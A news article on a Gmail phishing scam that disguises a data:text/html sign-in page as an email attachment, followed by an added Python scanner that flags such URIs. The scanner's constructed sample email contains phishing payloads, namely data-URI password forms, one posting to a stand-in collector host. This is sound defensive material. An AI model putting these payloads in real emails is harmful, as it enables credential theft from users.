Normally, phishing scams are pretty easy to detect, but some are devilishly clever and might dupe you if you are not careful. Attackers most often disguise themselves as someone you know, and the worst of it is that everything about the message seems perfectly normal. A recent such attempt has targeted Gmail users.
The attacker has been found doing the rounds of Gmail inboxes. In this phishing scam, users are sent an email with what looks like a legitimate attachment. To preview it, users click on the attachment, and what they actually see is an embedded image. Clicking that image takes them to a Google sign-in page, where they are asked to enter their password.
In reality, there is no attachment at all. The embedded image is designed to look like one, but it links to a fake page instead. Sources report that the page is actually a data URI with the prefix “data:text/html”, not the HTTPS-secured URL that most users expect. When people fall for the scam, the attackers use the stolen credentials for all kinds of abuse, including sending more phishing emails to the victim’s contacts.
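As an added example (not from the original article and not Google's own tooling), here is a small Python scanner that pulls every link out of an HTML email body and flags data:text/html URIs that carry a password form, the pattern described above, along with plain-http links; the sample email body and its hostnames are constructed.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote


class LinkExtractor(HTMLParser):
    """Collect every href/src attribute value from an HTML email body."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.links.append(value.strip())


def decode_data_uri(uri):
    """Return (mediatype, decoded payload) for a data: URI, or None if malformed."""
    m = re.match(r"data:([^,]*),(.*)", uri, re.S | re.I)
    if not m:
        return None
    meta, payload = m.group(1), m.group(2)
    mediatype = meta.split(";")[0].strip().lower()   # tolerate "data: text/html"
    if ";base64" in meta.lower():
        try:
            raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
        except ValueError:
            return None
        payload = raw.decode("utf-8", "replace")
    else:
        payload = unquote(payload)                   # percent-encoded HTML
    return mediatype, payload


def classify_link(link):
    """Label one link: data-html-login, data-html, plain-http, or ok."""
    scheme = link.split(":", 1)[0].strip().lower()
    if scheme == "data":
        decoded = decode_data_uri(link)
        if decoded and decoded[0] == "text/html":
            # An inline HTML document asking for a password is the tell-tale sign.
            if re.search(r"type\s*=\s*['\"]?password", decoded[1], re.I):
                return "data-html-login"
            return "data-html"
        return "ok"                                  # e.g. inline images
    return "plain-http" if scheme == "http" else "ok"


def suspicious_links(html_body):
    """Return [(link, label)] for every link that is not plain 'ok'."""
    parser = LinkExtractor()
    parser.feed(html_body)
    labelled = [(link, classify_link(link)) for link in parser.links]
    return [(link, label) for link, label in labelled if label != "ok"]


# Constructed sample (not a real campaign): one image, one genuine Drive link,
# and two data:text/html URIs carrying a credential form (one percent-encoded,
# one base64-encoded).
_FORM_HTML = b'<html><form action="https://collector.invalid/"><input type="password" name="Passwd"></form></html>'
SAMPLE_EMAIL = (
    '<p>Please review the attached document.</p>'
    '<a href="data:text/html,%3Cform%3E%3Cinput%20type%3D%22password%22%3E%3C/form%3E">'
    '<img src="https://mail.example.invalid/thumb.png"></a>'
    '<a href="https://docs.google.com/document/d/constructed-id">Open in Drive</a>'
    '<a href="data:text/html;base64,' + base64.b64encode(_FORM_HTML).decode() + '">Sign in</a>'
)
```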
This is the closest I’ve ever come to falling for a Gmail phishing attack. If it hadn’t been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh
— Tom Scott (@tomscott) December 23, 2016
Right now, Chrome addresses the issue by marking such pages as “Not secure” in the address bar when the form page is displayed. With very few clues to mark an email as a phishing attempt, it is understandable that people actually fall for it. But to be on the safe side, it is better to check the URL next time before clicking an attachment in an email.
Via: Life Hacker